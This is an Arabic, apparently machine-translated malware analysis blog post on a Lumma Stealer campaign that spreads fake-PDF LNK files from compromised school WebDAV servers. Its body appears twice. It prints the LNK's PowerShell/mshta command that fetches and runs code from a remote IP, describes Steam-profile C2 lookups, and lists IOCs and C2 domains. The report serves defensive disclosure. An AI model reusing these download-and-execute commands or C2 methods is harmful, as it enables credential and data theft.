🚀 لقد رفعت CloudSek جولة B1 من السلسلة B1 بقيمة 19 مليون دولار - تعزيز مستقبل الأمن السيبراني التنبؤي

Lumma Stealer Chronicles: حملة تحت عنوان PDF باستخدام البنية التحتية للمؤسسات التعليمية المعرضة للخطر

تستغل حملة Lumma Stealer للبرامج الضارة المؤسسات التعليمية المخترقة لتوزيع ملفات LNK الضارة المتخفية في صورة ملفات PDF، وتستهدف صناعات مثل التمويل والرعاية الصحية والتكنولوجيا والإعلام. بمجرد تنفيذ هذه الملفات، تبدأ عملية إصابة خفية متعددة المراحل، مما يسمح لمجرمي الإنترنت بسرقة كلمات المرور وبيانات المتصفح ومحافظ العملات المشفرة. بفضل تقنيات التهرب المتطورة، بما في ذلك استخدام ملفات تعريف Steam لعمليات القيادة والتحكم، يسلط تهديد البرامج الضارة كخدمة (MaaS) الضوء على الحاجة الملحة لدفاعات قوية للأمن السيبراني. كن يقظًا ضد أساليب التصيد الاحتيالي الخادعة لحماية المعلومات الحساسة من الاستغلال الإلكتروني.

مايانك ساهاريا
February 14, 2025
Green Alert
Last Update posted on
August 21, 2025
المراقبة الاستباقية للويب المظلم لمؤسستك.

يمكنك مراقبة مؤسستك والدفاع عنها بشكل استباقي ضد التهديدات من الويب المظلم باستخدام CloudSek xviGil.

Schedule a Demo
Table of Contents
Author(s)
No items found.

ملخص تنفيذي

Lumma Stealer هو برنامج ضار لسرقة المعلومات يتم تقديمه من خلال منصة البرامج الضارة كخدمة (MaaS). تم تصميمه لسرقة البيانات الحساسة، بما في ذلك كلمات المرور ومعلومات المتصفح وتفاصيل محفظة العملة المشفرة.

يوضح هذا التقرير تفاصيل حملة البرامج الضارة المستمرة التي توزع سارق معلومات Lumma Stealer. يتضمن ناقل العدوى الأساسي للحملة استخدام ملفات LNK (الاختصارات) الضارة التي تم تصميمها لتظهر كمستندات PDF شرعية. تبدأ ملفات LNK هذه، عند تنفيذها، عملية إصابة متعددة المراحل تؤدي في النهاية إلى نشر Lumma Stealer على جهاز الضحية. وتركز الحملة على خداع المستخدمين لتنفيذ ملفات ضارة، وتسليط الضوء على أهمية وعي المستخدم والتدابير الأمنية القوية. تستهدف حملة البرامج الضارة العديد من الصناعات، بما في ذلك التعليم والأوساط الأكاديمية، والشركات والأعمال، والحكومة والشؤون القانونية، والرعاية الصحية والأدوية، والمالية والمصرفية، والهندسة والتصنيع، والتكنولوجيا والبلوك تشين، والإعلام والصحافة.

في السابق، نشرنا تقريرين بحثيين متعمقين لتحليل حملة Lumma Stealer، مع تفصيل تكتيكاتها وتقنياتها وإجراءاتها (TTPs) التي تستخدمها الجهات الفاعلة في مجال التهديد لتوزيع البرامج الضارة ونشرها.

الخريطة الذهنية للحملة

الإسناد والتحليل

خلال حل وسط من سيارة إلى أخرى، تتم إعادة توجيه المستخدم في البداية إلى خادم ويبداف أثناء زيارة مواقع ويب معينة، وإنشاء اتصال دون علم. قد تؤدي عملية إعادة التوجيه هذه إلى تشغيل معاينة نافذة explorer.exe، وعرض محتويات خادم WebDAV، والذي يستضيف ملفات ضارة مصممة لاستغلال نقاط الضعف في النظام أو تقديم برامج ضارة.

في البنية التحتية التي تم تحليلها، ملفات ضارة تم استضافتهم على خادم ويبداف داخل الدليل المفتوح «http://87[.]120[.]115[.]240/Downloads/254-zebar-school-for-children-thaltej-pro-order-abad-rural.pdf.lnk»، عندما ينقر المستخدم لتنزيل هيكل الرسوم المدرسية، يقومون بتنزيل ملف ملف "pdf.lnk" الضار، والذي يظهر كملف PDF بسبب أيقونته.

ينقر المستخدمون على ملف PDF للتنزيل

يحتوي الدليل بشكل أساسي ملف «.lnk»، والتي تم تسليحها من أجل تنزيل حمولات ضارة إضافية باستخدام «mshta.exe»، وهو برنامج تنفيذي شرعي من Microsoft مصمم للتشغيل ملفات تطبيق ميكروسوفت أتش تي أم أل (HTA).

غالبًا ما يتم الاستفادة من ملفات LNK (الاختصارات) كنقطة دخول في حملات التصيد الاحتيالي. من خلال استغلال ميزاتها الفريدة، يمكن للجهات الفاعلة في مجال التهديد خداع المستخدمين وتجاوز الإجراءات الأمنية، مما يجعلهم أدوات فعالة للتسلل إلى الأنظمة والشبكات.

يقوم ملف LNK بتشغيل ملف بوويرشيل الأمر الذي يتصل بـ بعيد الخادم، مما يؤدي إلى المرحلة التالية من الهجوم. «استدعاء عملية C:\Windows\System32\Wbem\wmic.exe ينشئ «بوويرشيل إنيكس '\ *i*\ S*3*\ m*ta.e* https://80.76.51.231/Samarik' | بوويرشيل -»

برنامج بوويرشيل في ملف لينك

هذه الاختصارات الخادعة، التي غالبًا ما تكون مموهة كملفات تنفيذية مشروعة أو ملفات PDF، تغري المستخدمين المطمئنين إلى النقر، مما يؤدي في النهاية إلى تعريض أنظمتهم أو شبكاتهم للخطر.

قمنا باستخراج النص عن طريق التخلص من قسم التراكب، والكشف عن شيء غامض جافا سكريبت كود.

البرنامج النصي في التراكب

مشوشة جافا سكريبت كود في قسم التراكب في ساماريك

جافا سكريبت في قسم التراكب

تقوم هذه الوظيفة بتقييم شفرة JavaScript المخزنة في المتغير aEQ. يعد استخدام eval أسلوبًا شائعًا في البرامج النصية الغامضة أو الخبيثة.

تقوم Mshta بتنفيذ برنامج Java النصي

يمكن رؤية البرنامج النصي PowerShell من خلال البرنامج النصي JS المبهم. يتم تضمين حمولة مشفرة بـ AES وإجراء لفك تشفيرها في وضع CBC باستخدام مفتاح فك التشفير الثابت في برنامج PowerShell النصي هذا. كما تستخدم تقنيات التشويش الرياضي البسيطة في البرنامج النصي.

سكربت بوويرشيل المشفر

تُظهر المتغيرات والوظائف العادية لبرنامج PowerShell النصي كيفية تنزيل الحمولة وتنفيذها.

نص PS تم فك تشفيره وتطبيعه

يتم تنزيل البرنامج النصي النهائي لـ PowerShell واستخراج المحتويات وتنفيذها»كومباس-4.1.2.exe«(لوما ستيلر) من https [:] //80.76.51 [.] 231/كومباس-4.1.2.exe

يحاول Lumma Stealer الاتصال بخوادم الأوامر والتحكم (C2) لتصفية البيانات المسروقة بعد إصابة النظام. يحاول الوصول إلى نطاقات خادم C2 متعددة؛ ومع ذلك، لا يمكن الوصول إلى هذه الخوادم حاليًا.

تتواصل البرامج الضارة مع c2 وsteamcommunity

يستخدم النموذج اتصال Steam إذا لم يتمكن من الوصول إلى كل مجال C2 يمتلكه. تختلف عناوين URL الخاصة بـ Steam عن نطاقات C2 من حيث أنها تحتوي على تقنيات فك تشفير مميزة ويتم تخزينها كرموز تنفيذ.

hxxps: //steamcommunity.com/profiles/76561199724331900

يتبع الرقم 76561199724331900 تنسيق معرف Steam64، مما يشير إلى أن عميل Steam أو اللعبة ربما تحاول حل خدمة شبكة. يشير هذا إلى أن جهازًا على الشبكة يحاول حل الاسم (من المحتمل أن يكون مرتبطًا بجلسة Steam أو خادم الألعاب). تم إنشاء ملف التعريف في 28 يونيو 2024.

يعد إخفاء C2 عبر ملفات تعريف Steam أسلوبًا متطورًا للتهرب ينتهك منصة موثوقة للاتصال الخفي بالقيادة والتحكم.

حساب ستيم بروفايل «76561199724331900"

من المرجح أن يكون ممثل التهديد قد أنشأ عنوان URL هذا لـ Steam، وهو صفحة ملف تعريف لحساب Steam. تتصل العينة أولاً بموقع الويب، وتوزع علامة «actual_persona_name» لاستخراج السلاسل، ثم تستخدم طريقة تشفير Caesar لفك تشفير السلاسل واستخراج نطاقات C2.

فئة أتش تي أم أل من ستيم

استنادًا إلى تحليل الأسماء المختلفة التي تحاكي مستندات PDF الشرعية (مثل العقود والتقارير المالية والمواد الأكاديمية والكتيبات الفنية)، تستهدف برامج Lumma Stealer الضارة الصناعات بما في ذلك على سبيل المثال لا الحصر التعليم والأوساط الأكاديمية والشركات والأعمال والحكومة والشؤون القانونية والرعاية الصحية والأدوية والمالية والمصرفية والهندسة والتصنيع والتكنولوجيا والبلوك تشين والإعلام والصحافة.

أسماء مختلفة تحاكي مستندات PDF الشرعية

تكتيكات وتقنيات MITRE ATT&CK:

Tactic Technique
Execution (TA0002) T1059 – Command and Scripting Interpreter: PowerShell
T1204.002 – User Execution: Malicious File
T1047 – Windows Management Instrumentation (WMI)
Persistence (TA0003) T1547.001 – Registry Run Keys / Startup Folder
Privilege Escalation (TA0004) T1218.011 – System Binary Proxy Execution: Rundll32
Defense Evasion (TA0005) T1027 – Obfuscated Files or Information
T1036.003 – Masquerading: Rename System Utilities
T1564.003 – Hide Artifacts: Hidden Window
Credential Access (TA0006) T1012 – Query Registry
Discovery (TA0007) T1082 – System Information Discovery
Lateral Movement (TA0008) T1021.002 – Remote Services: SMB/Windows Admin Shares
Collection (TA0009) T1114 – Email Collection
T1560 – Archive Collected Data
Command and Control (TA0011) T1071 – Application Layer Protocol
Exfiltration (TA0010) T1041 – Exfiltration Over C2 Channel
Impact (TA0040) T1489 – Service Stop
T1490 – Inhibit System Recovery

مؤشرات التسوية (IOCs):

Hash's (sha256) File
BB2E14BB962873722F1FD132FF66C4AFD2F7DC9B6891C746D697443C0007426A pdf.lnk
e15c6ecb32402f981c06f3d8c48f7e3a5a36d0810aa8c2fb8da0be053b95a8e2 Kompass-4.1.2.exe (Lumma stealer)
40b80287ba2af16daaf8e74a9465a0b876ab39f68c7ba6405cfcb41601eeec15 Samarik
URL Category
tripeggyun.fun Domain
processhol.sbs Domain
librari-night.sbs Domain
befall-sm0ker.sbs Domain
p10tgrace.sbs Domain
peepburry828.sbs Domain
owner-vacat10n.sbs Domain
3xp3cts1aim.sbs Domain
p3ar11fter.sbs Domain
smiteattacker.org Decrypted Steam C2 Domains
yuriy-gagarin.com Decrypted Steam C2 Domains
vladimir-ulyanov.com Decrypted Steam C2 Domains
nikolay-romanov.su Decrypted Steam C2 Domains
aleksandr-block.com Decrypted Steam C2 Domains
misha-lomonosov.com Decrypted Steam C2 Domains
sputnik-1985.com Decrypted Steam C2 Domains
lev-tolstoi.com Decrypted Steam C2 Domains
https[:]//80.76.51.231/Kompass-4.1.2.exe Remote C2 URL
https[:]//80.76.51.231/Samarik Remote C2 URL
http[:]//87.120.115.240/Downloads/254-zebar-school-for-children-that-tej-pro-order-abad-rural.pdf.lnk WebDAV Servers (Lnk hosted)
IPv4 Category
87.120.115.240 IP
80.76.51.231 IP

المراجع

Predict Cyber threats against your organization

Related Posts
No items found.

انضم إلى أكثر من 10,000 مشترك

تابع آخر الأخبار حول سلالات البرامج الضارة، وأساليب التصيد الاحتيالي،
مؤشرات التسوية وتسريب البيانات.

Take action now

Secure your organisation with our Award winning Products

CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.

استخبارات الخصم
Table of Content

ملخص تنفيذي

Lumma Stealer هو برنامج ضار لسرقة المعلومات يتم تقديمه من خلال منصة البرامج الضارة كخدمة (MaaS). تم تصميمه لسرقة البيانات الحساسة، بما في ذلك كلمات المرور ومعلومات المتصفح وتفاصيل محفظة العملة المشفرة.

يوضح هذا التقرير تفاصيل حملة البرامج الضارة المستمرة التي توزع سارق معلومات Lumma Stealer. يتضمن ناقل العدوى الأساسي للحملة استخدام ملفات LNK (الاختصارات) الضارة التي تم تصميمها لتظهر كمستندات PDF شرعية. تبدأ ملفات LNK هذه، عند تنفيذها، عملية إصابة متعددة المراحل تؤدي في النهاية إلى نشر Lumma Stealer على جهاز الضحية. وتركز الحملة على خداع المستخدمين لتنفيذ ملفات ضارة، وتسليط الضوء على أهمية وعي المستخدم والتدابير الأمنية القوية. تستهدف حملة البرامج الضارة العديد من الصناعات، بما في ذلك التعليم والأوساط الأكاديمية، والشركات والأعمال، والحكومة والشؤون القانونية، والرعاية الصحية والأدوية، والمالية والمصرفية، والهندسة والتصنيع، والتكنولوجيا والبلوك تشين، والإعلام والصحافة.

في السابق، نشرنا تقريرين بحثيين متعمقين لتحليل حملة Lumma Stealer، مع تفصيل تكتيكاتها وتقنياتها وإجراءاتها (TTPs) التي تستخدمها الجهات الفاعلة في مجال التهديد لتوزيع البرامج الضارة ونشرها.

الخريطة الذهنية للحملة

الإسناد والتحليل

خلال حل وسط من سيارة إلى أخرى، تتم إعادة توجيه المستخدم في البداية إلى خادم ويبداف أثناء زيارة مواقع ويب معينة، وإنشاء اتصال دون علم. قد تؤدي عملية إعادة التوجيه هذه إلى تشغيل معاينة نافذة explorer.exe، وعرض محتويات خادم WebDAV، والذي يستضيف ملفات ضارة مصممة لاستغلال نقاط الضعف في النظام أو تقديم برامج ضارة.

في البنية التحتية التي تم تحليلها، ملفات ضارة تم استضافتهم على خادم ويبداف داخل الدليل المفتوح «http://87[.]120[.]115[.]240/Downloads/254-zebar-school-for-children-thaltej-pro-order-abad-rural.pdf.lnk»، عندما ينقر المستخدم لتنزيل هيكل الرسوم المدرسية، يقومون بتنزيل ملف ملف "pdf.lnk" الضار، والذي يظهر كملف PDF بسبب أيقونته.

ينقر المستخدمون على ملف PDF للتنزيل

يحتوي الدليل بشكل أساسي ملف «.lnk»، والتي تم تسليحها من أجل تنزيل حمولات ضارة إضافية باستخدام «mshta.exe»، وهو برنامج تنفيذي شرعي من Microsoft مصمم للتشغيل ملفات تطبيق ميكروسوفت أتش تي أم أل (HTA).

غالبًا ما يتم الاستفادة من ملفات LNK (الاختصارات) كنقطة دخول في حملات التصيد الاحتيالي. من خلال استغلال ميزاتها الفريدة، يمكن للجهات الفاعلة في مجال التهديد خداع المستخدمين وتجاوز الإجراءات الأمنية، مما يجعلهم أدوات فعالة للتسلل إلى الأنظمة والشبكات.

يقوم ملف LNK بتشغيل ملف بوويرشيل الأمر الذي يتصل بـ بعيد الخادم، مما يؤدي إلى المرحلة التالية من الهجوم. «استدعاء عملية C:\Windows\System32\Wbem\wmic.exe ينشئ «بوويرشيل إنيكس '\ *i*\ S*3*\ m*ta.e* https://80.76.51.231/Samarik' | بوويرشيل -»

برنامج بوويرشيل في ملف لينك

هذه الاختصارات الخادعة، التي غالبًا ما تكون مموهة كملفات تنفيذية مشروعة أو ملفات PDF، تغري المستخدمين المطمئنين إلى النقر، مما يؤدي في النهاية إلى تعريض أنظمتهم أو شبكاتهم للخطر.

قمنا باستخراج النص عن طريق التخلص من قسم التراكب، والكشف عن شيء غامض جافا سكريبت كود.

البرنامج النصي في التراكب

مشوشة جافا سكريبت كود في قسم التراكب في ساماريك

جافا سكريبت في قسم التراكب

تقوم هذه الوظيفة بتقييم شفرة JavaScript المخزنة في المتغير aEQ. يعد استخدام eval أسلوبًا شائعًا في البرامج النصية الغامضة أو الخبيثة.

تقوم Mshta بتنفيذ برنامج Java النصي

يمكن رؤية البرنامج النصي PowerShell من خلال البرنامج النصي JS المبهم. يتم تضمين حمولة مشفرة بـ AES وإجراء لفك تشفيرها في وضع CBC باستخدام مفتاح فك التشفير الثابت في برنامج PowerShell النصي هذا. كما تستخدم تقنيات التشويش الرياضي البسيطة في البرنامج النصي.

سكربت بوويرشيل المشفر

تُظهر المتغيرات والوظائف العادية لبرنامج PowerShell النصي كيفية تنزيل الحمولة وتنفيذها.

نص PS تم فك تشفيره وتطبيعه

يتم تنزيل البرنامج النصي النهائي لـ PowerShell واستخراج المحتويات وتنفيذها»كومباس-4.1.2.exe«(لوما ستيلر) من https [:] //80.76.51 [.] 231/كومباس-4.1.2.exe

يحاول Lumma Stealer الاتصال بخوادم الأوامر والتحكم (C2) لتصفية البيانات المسروقة بعد إصابة النظام. يحاول الوصول إلى نطاقات خادم C2 متعددة؛ ومع ذلك، لا يمكن الوصول إلى هذه الخوادم حاليًا.

تتواصل البرامج الضارة مع c2 وsteamcommunity

يستخدم النموذج اتصال Steam إذا لم يتمكن من الوصول إلى كل مجال C2 يمتلكه. تختلف عناوين URL الخاصة بـ Steam عن نطاقات C2 من حيث أنها تحتوي على تقنيات فك تشفير مميزة ويتم تخزينها كرموز تنفيذ.

hxxps: //steamcommunity.com/profiles/76561199724331900

يتبع الرقم 76561199724331900 تنسيق معرف Steam64، مما يشير إلى أن عميل Steam أو اللعبة ربما تحاول حل خدمة شبكة. يشير هذا إلى أن جهازًا على الشبكة يحاول حل الاسم (من المحتمل أن يكون مرتبطًا بجلسة Steam أو خادم الألعاب). تم إنشاء ملف التعريف في 28 يونيو 2024.

يعد إخفاء C2 عبر ملفات تعريف Steam أسلوبًا متطورًا للتهرب ينتهك منصة موثوقة للاتصال الخفي بالقيادة والتحكم.

حساب ستيم بروفايل «76561199724331900"

من المرجح أن يكون ممثل التهديد قد أنشأ عنوان URL هذا لـ Steam، وهو صفحة ملف تعريف لحساب Steam. تتصل العينة أولاً بموقع الويب، وتوزع علامة «actual_persona_name» لاستخراج السلاسل، ثم تستخدم طريقة تشفير Caesar لفك تشفير السلاسل واستخراج نطاقات C2.

فئة أتش تي أم أل من ستيم

استنادًا إلى تحليل الأسماء المختلفة التي تحاكي مستندات PDF الشرعية (مثل العقود والتقارير المالية والمواد الأكاديمية والكتيبات الفنية)، تستهدف برامج Lumma Stealer الضارة الصناعات بما في ذلك على سبيل المثال لا الحصر التعليم والأوساط الأكاديمية والشركات والأعمال والحكومة والشؤون القانونية والرعاية الصحية والأدوية والمالية والمصرفية والهندسة والتصنيع والتكنولوجيا والبلوك تشين والإعلام والصحافة.

أسماء مختلفة تحاكي مستندات PDF الشرعية

تكتيكات وتقنيات MITRE ATT&CK:

Tactic Technique
Execution (TA0002) T1059 – Command and Scripting Interpreter: PowerShell
T1204.002 – User Execution: Malicious File
T1047 – Windows Management Instrumentation (WMI)
Persistence (TA0003) T1547.001 – Registry Run Keys / Startup Folder
Privilege Escalation (TA0004) T1218.011 – System Binary Proxy Execution: Rundll32
Defense Evasion (TA0005) T1027 – Obfuscated Files or Information
T1036.003 – Masquerading: Rename System Utilities
T1564.003 – Hide Artifacts: Hidden Window
Credential Access (TA0006) T1012 – Query Registry
Discovery (TA0007) T1082 – System Information Discovery
Lateral Movement (TA0008) T1021.002 – Remote Services: SMB/Windows Admin Shares
Collection (TA0009) T1114 – Email Collection
T1560 – Archive Collected Data
Command and Control (TA0011) T1071 – Application Layer Protocol
Exfiltration (TA0010) T1041 – Exfiltration Over C2 Channel
Impact (TA0040) T1489 – Service Stop
T1490 – Inhibit System Recovery

مؤشرات التسوية (IOCs):

Hash's (sha256) File
BB2E14BB962873722F1FD132FF66C4AFD2F7DC9B6891C746D697443C0007426A pdf.lnk
e15c6ecb32402f981c06f3d8c48f7e3a5a36d0810aa8c2fb8da0be053b95a8e2 Kompass-4.1.2.exe (Lumma stealer)
40b80287ba2af16daaf8e74a9465a0b876ab39f68c7ba6405cfcb41601eeec15 Samarik
URL Category
tripeggyun.fun Domain
processhol.sbs Domain
librari-night.sbs Domain
befall-sm0ker.sbs Domain
p10tgrace.sbs Domain
peepburry828.sbs Domain
owner-vacat10n.sbs Domain
3xp3cts1aim.sbs Domain
p3ar11fter.sbs Domain
smiteattacker.org Decrypted Steam C2 Domains
yuriy-gagarin.com Decrypted Steam C2 Domains
vladimir-ulyanov.com Decrypted Steam C2 Domains
nikolay-romanov.su Decrypted Steam C2 Domains
aleksandr-block.com Decrypted Steam C2 Domains
misha-lomonosov.com Decrypted Steam C2 Domains
sputnik-1985.com Decrypted Steam C2 Domains
lev-tolstoi.com Decrypted Steam C2 Domains
https[:]//80.76.51.231/Kompass-4.1.2.exe Remote C2 URL
https[:]//80.76.51.231/Samarik Remote C2 URL
http[:]//87.120.115.240/Downloads/254-zebar-school-for-children-that-tej-pro-order-abad-rural.pdf.lnk WebDAV Servers (Lnk hosted)
IPv4 Category
87.120.115.240 IP
80.76.51.231 IP

المراجع

مايانك ساهاريا

Related Blogs